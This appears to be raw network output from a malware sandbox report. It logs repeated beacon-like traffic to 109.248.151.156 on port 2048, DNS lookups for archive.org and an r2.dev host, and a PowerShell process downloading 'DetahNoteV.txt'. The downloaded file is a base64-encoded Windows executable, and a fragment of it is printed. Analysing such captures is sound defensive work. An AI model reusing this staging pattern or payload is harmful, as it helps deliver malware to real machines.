                                                                                    Oct 2, 2024 05:23:21.996380091 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:21.996380091 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:21.996408939 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.075994015 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076037884 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076052904 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076071978 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076082945 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076095104 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076106071 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076128960 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076129913 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076173067 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076211929 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076225042 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076236010 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076246023 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076257944 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076267958 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076267958 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076350927 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076364994 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076376915 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076389074 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076400995 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076411009 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076421022 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076436043 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076436043 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076441050 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076491117 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076503038 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076505899 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076576948 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076646090 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076658010 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076669931 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076683998 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076695919 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076708078 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076719046 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076723099 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076719046 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076734066 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076742887 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076745033 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076757908 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076761007 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076788902 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076910973 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076925039 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076936960 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076946974 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076956987 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076968908 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.076976061 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.076976061 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.077138901 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078372002 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078389883 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078402996 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078413963 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078423977 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078434944 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078438044 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078438044 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078453064 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078461885 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078466892 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078479052 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078489065 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078490973 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078501940 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078512907 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078524113 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078535080 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078535080 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078535080 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078545094 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078556061 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078567028 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078571081 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078577995 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078588963 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078602076 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078608036 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078608036 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078613997 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078650951 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078650951 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078856945 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078869104 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078880072 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078890085 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078907967 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078918934 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078929901 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078938961 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078938961 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078939915 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078954935 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078968048 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078984022 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078986883 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.078998089 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.078999996 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079010963 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079016924 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.079020977 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079031944 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.079032898 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079046011 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079056025 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079075098 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079086065 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079093933 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.079093933 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.079099894 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079111099 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079124928 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.079133987 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.079134941 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.079175949 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082376957 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082397938 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082448959 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082461119 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082461119 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082473993 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082485914 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082498074 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082528114 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082528114 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082536936 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082547903 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082560062 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082585096 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082603931 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082613945 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082616091 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082627058 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082638025 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082673073 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082694054 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082782984 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082796097 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082807064 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082817078 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082828045 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082834005 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082839012 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082851887 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.082875967 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.082875967 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083089113 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083137989 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083144903 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083158970 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083172083 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083183050 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083194017 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083203077 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083235979 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083245993 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083257914 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083292007 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083580017 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083595037 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083607912 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083630085 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083636045 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083650112 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083662033 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083673000 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083684921 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.083688021 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083688021 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.083748102 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.122805119 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163585901 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163616896 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163628101 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163641930 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163655996 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163655996 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163665056 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163676977 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163690090 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163690090 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163707972 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163738966 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163778067 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163789988 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163803101 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163830042 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163858891 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163872957 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163883924 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163897991 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163918972 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.163975000 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163986921 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.163999081 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164007902 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164019108 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164042950 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164042950 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164063931 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164076090 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164087057 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164103031 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164128065 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164159060 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164170980 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164180994 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164199114 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164307117 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164321899 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164333105 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164343119 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164355993 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164359093 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164371014 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164382935 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164382935 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164397001 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164424896 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.164457083 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164469004 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164479971 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:22.164503098 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.216548920 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.453000069 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:22.457890034 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:38.752603054 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:38.752895117 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:38.757852077 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:58.754108906 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:23:58.754417896 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:23:58.759174109 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:24:18.755283117 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:24:18.755919933 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:24:18.760776043 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:24:38.767635107 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:24:38.768079996 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:24:38.772963047 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:24:58.769521952 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:24:58.770154953 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:24:58.775013924 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:25:19.102435112 CEST204849704109.248.151.156192.168.2.10
                                                                                    Oct 2, 2024 05:25:19.102916002 CEST497042048192.168.2.10109.248.151.156
                                                                                    Oct 2, 2024 05:25:19.107700109 CEST204849704109.248.151.156192.168.2.10
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 2, 2024 05:23:11.549319983 CEST5610353192.168.2.101.1.1.1
                                                                                    Oct 2, 2024 05:23:11.697119951 CEST53561031.1.1.1192.168.2.10
                                                                                    Oct 2, 2024 05:23:14.835350990 CEST5902153192.168.2.101.1.1.1
                                                                                    Oct 2, 2024 05:23:14.844065905 CEST53590211.1.1.1192.168.2.10
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 2, 2024 05:23:11.549319983 CEST192.168.2.101.1.1.10xc68dStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                                                                    Oct 2, 2024 05:23:14.835350990 CEST192.168.2.101.1.1.10xf5d7Standard query (0)pub-26ee9be236b54d0cb1b570a203543b93.r2.devA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 2, 2024 05:23:11.697119951 CEST1.1.1.1192.168.2.100xc68dNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                                                                    Oct 2, 2024 05:23:14.844065905 CEST1.1.1.1192.168.2.100xf5d7No error (0)pub-26ee9be236b54d0cb1b570a203543b93.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                                                                    Oct 2, 2024 05:23:14.844065905 CEST1.1.1.1192.168.2.100xf5d7No error (0)pub-26ee9be236b54d0cb1b570a203543b93.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                                                                    • ia600100.us.archive.org
                                                                                    • pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.1049702207.241.227.2404431352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-02 03:23:12 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                                                    Host: ia600100.us.archive.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-02 03:23:12 UTC606INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.24.0 (Ubuntu)
                                                                                    Date: Wed, 02 Oct 2024 03:23:12 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 2823512
                                                                                    Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                                                    Connection: close
                                                                                    ETag: "66e22cba-2b1558"
                                                                                    Strict-Transport-Security: max-age=15724800
                                                                                    Expires: Wed, 02 Oct 2024 09:23:12 GMT
                                                                                    Cache-Control: max-age=21600
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                    Access-Control-Allow-Credentials: true
                                                                                    Accept-Ranges: bytes
                                                                                    2024-10-02 03:23:12 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                                                    Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                                                                    Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
